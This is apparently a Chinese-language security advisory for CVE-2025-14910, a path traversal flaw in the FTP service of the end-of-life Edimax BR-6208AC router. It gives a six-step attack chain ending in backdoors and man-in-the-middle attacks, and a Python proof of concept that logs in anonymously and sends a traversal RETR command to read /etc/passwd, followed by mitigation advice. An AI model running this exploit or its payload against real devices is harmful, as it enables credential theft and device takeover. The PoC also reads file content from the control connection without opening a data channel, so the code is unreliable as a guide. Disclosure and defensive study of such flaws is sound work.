CVE-2025-14910 Edimax BR-6208AC FTP服务路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-14910

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6208AC 1.02

漏洞概述

CVE-2025-14910是Edimax BR-6208AC 1.02版本路由器中发现的路径遍历漏洞。该漏洞存在于FTP守护进程服务的handle_retr函数中，攻击者可以通过构造特殊的FTP命令利用路径遍历技术（如../）访问服务器上的任意文件，包括系统配置文件、凭据文件等敏感信息。由于该产品已停止维护超过五年，厂商不再提供安全更新或技术支持。漏洞已被公开利用，CVSS评分4.3，属于中危级别。攻击者无需高权限即可发起攻击，对路由器的机密性造成一定影响，但不影响完整性和可用性。建议用户立即禁用FTP服务或升级到受支持的新型号设备。

技术细节

该漏洞位于Edimax BR-6208AC路由器FTP服务器的handle_retr函数中。攻击者通过FTP协议发送包含路径遍历序列（如../或..\）的文件请求，可以绕过FTP服务器的目录限制，访问系统任意路径下的文件。FTP服务的handle_retr函数在处理文件路径时未正确验证用户输入的路径，导致攻击者可以读取配置文件（如/etc/shadow、/etc/passwd等敏感文件）或设备上的其他私有文件。由于该路由器固件存在路径遍历过滤缺陷，恶意构造的FTP RETR命令可以直接读取目标设备文件系统中的文件内容。攻击者利用此漏洞可获取管理员密码、WiFi配置等敏感信息，进而完全控制路由器设备。

攻击链分析

STEP 1

步骤1

扫描目标网络，发现运行FTP服务的Edimax BR-6208AC路由器（默认端口21）

STEP 2

步骤2

使用匿名账户或低权限账户登录FTP服务器

STEP 3

步骤3

构造包含路径遍历序列（../）的RETR命令，如RETR ../../../../etc/passwd

STEP 4

步骤4

发送恶意构造的FTP请求，触发handle_retr函数的路径遍历漏洞

STEP 5

步骤5

服务器返回目标文件内容，攻击者获取敏感配置文件、凭据或密钥信息

STEP 6

步骤6

利用获取的凭据进行进一步攻击，如修改路由器配置、植入后门或进行中间人攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

def exploit_ftp_path_traversal(target_ip, target_port=21):
    """PoC for CVE-2025-14910: FTP Path Traversal in Edimax BR-6208AC"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        response = sock.recv(1024)
        print(f"[+] FTP Banner: {response.decode().strip()}")
        
        # Anonymous login
        sock.send(b"USER anonymous\r\n")
        response = sock.recv(1024)
        print(f"[*] Login response: {response.decode().strip()}")
        
        sock.send(b"PASS anonymous@\r\n")
        response = sock.recv(1024)
        print(f"[*] Pass response: {response.decode().strip()}")
        
        # Path traversal payload to read /etc/passwd
        # Using RETR command with ../ to traverse directories
        payload = "RETR ../../../../etc/passwd\r\n"
        print(f"[*] Sending path traversal payload: {payload.strip()}")
        sock.send(payload.encode())
        
        # Receive file content
        response = sock.recv(8192)
        print(f"[+] File content:\n{response.decode()}")
        
        sock.send(b"QUIT\r\n")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    target = input("Enter target IP: ").strip()
    exploit_ftp_path_traversal(target)

影响范围

Edimax BR-6208AC 1.02

防御指南

临时缓解措施

由于Edimax BR-6208AC已停止维护五年，官方不再提供安全更新。建议用户立即禁用该设备的FTP服务功能以缓解漏洞风险。如需继续使用该设备，应将其隔离在独立的网络分段中，并使用其他安全设备（如防火墙）进行防护。长期解决方案是升级到Edimax或其他厂商的受支持型号路由器。